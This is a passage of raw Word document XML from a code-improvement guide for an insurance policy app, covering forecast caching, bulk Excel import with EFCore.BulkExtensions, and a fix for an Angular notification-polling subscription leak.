        <w:t xml:space="preserve">            return JsonSerializer.Deserialize&lt;InvestmentForecastDto&gt;(cached)!;</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 Compute forecast</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">        var result = await ComputeForecastAsync(fyYear, selectedMembers);</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 Cache for 15 minutes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">        var cacheOptions = new DistributedCacheEntryOptions</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AbsoluteExpirationRelativeToNow = TimeSpan.FromMinutes(15)</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await _cache.SetStringAsync(cacheKey,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">            JsonSerializer.Serialize(result), cacheOptions);</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return result;</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 Invalidate cache when a payment is recorded or policy is updated</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    public async Task InvalidateForecastCacheAsync(int userId)</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 Pattern-based invalidation: remove all forecast keys</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">        // Call this from MarkAsPaidAsync and UpdatePolicyAsync</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w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="140" w:before="320"/>
      </w:pPr>
      <w:bookmarkStart w:name="sec2-3" w:id="1"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4F46E5"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">2.3  Excel Import — Bulk Insert with EFCore.BulkExtensions</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="475569"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Problem</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="374151"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">The current import does AnyAsync per row to check for duplicate policy numbers, then SaveChangesAsync after all rows — this is O(n) database reads for the duplicate check. For a 500-row import, that is 500 separate SELECT queries before a single INSERT.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="475569"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Package to Install</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">dotnet add package EFCore.BulkExtensions</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="475569"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Modified UploadPoliciesFromExcelAsync — Key Changes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">// BEFORE — Per-row duplicate check (500 queries for 500 rows):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">if (existingPolicyNumbers.Contains(policyNumber) ||</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    processedInFile.Contains(policyNumber)) { ... }</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AFTER — Bulk pre-load all existing numbers once:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">var existingPolicyNumbers = new HashSet&lt;string&gt;(</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    await _context.Policies</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">        .AsNoTracking()</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">        .Select(p =&gt; p.PolicyNumber)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">        .ToListAsync()</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">);</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Collect all valid new policies first, then bulk insert:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">if (newPolicies.Any())</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">{</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    var bulkConfig = new BulkConfig</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BatchSize = 100,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">        SetOutputIdentity = false,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">        PreserveInsertOrder = false,</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await _context.BulkInsertAsync(newPolicies, bulkConfig);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">// This reduces 500-row import from ~5s to ~200ms</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="140" w:before="320"/>
      </w:pPr>
      <w:bookmarkStart w:name="sec2-4" w:id="1"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4F46E5"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">2.4  Frontend — Fix Notification Service Subscription Leak</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="475569"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">File: notification.service.ts</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="475569"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Problem</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="374151"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">startPolling() creates an interval observable that is never unsubscribed. When a user logs out and logs back in, a second polling interval starts, then a third — each making API calls and leaking memory.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">// BEFORE — leaking subscription:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">startPolling(): void {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    interval(this.pollingIntervalMs).pipe(</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">        startWith(0),</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">        switchMap(() =&gt; this.getNotifications())</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    ).subscribe({ next: (res) =&gt; { ... } });</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">}</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AFTER — properly managed subscription:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">private pollingSubscription?: Subscription;</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startPolling(): void {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    this.stopPolling();  // Always stop before starting</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    this.pollingSubscription = interval(this.pollingIntervalMs).pipe(</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">        startWith(0),</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">        switchMap(() =&gt; this.getNotifications())</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    ).subscribe({</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">        next: (res) =&gt; { if (res.data) this._summary$.next(res.data); },</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">        error: () =&gt; {}</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stopPolling(): void {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    this.pollingSubscription?.unsubscribe();</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    this.pollingSubscription = undefined;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">}</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Call stopPolling() in AuthService.logout()</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="140" w:before="320"/>
      </w:pPr>
      <w:bookmarkStart w:name="sec2-5" w:id="1"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4F46E5"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">2.5  Frontend — Fix Chart Destroy/Recreate Pattern</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="475569"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Files: forecast-chart.component.ts, investment-forecast.component.ts</w:t>
      </w:r>
    </w:p>
    <w:p>
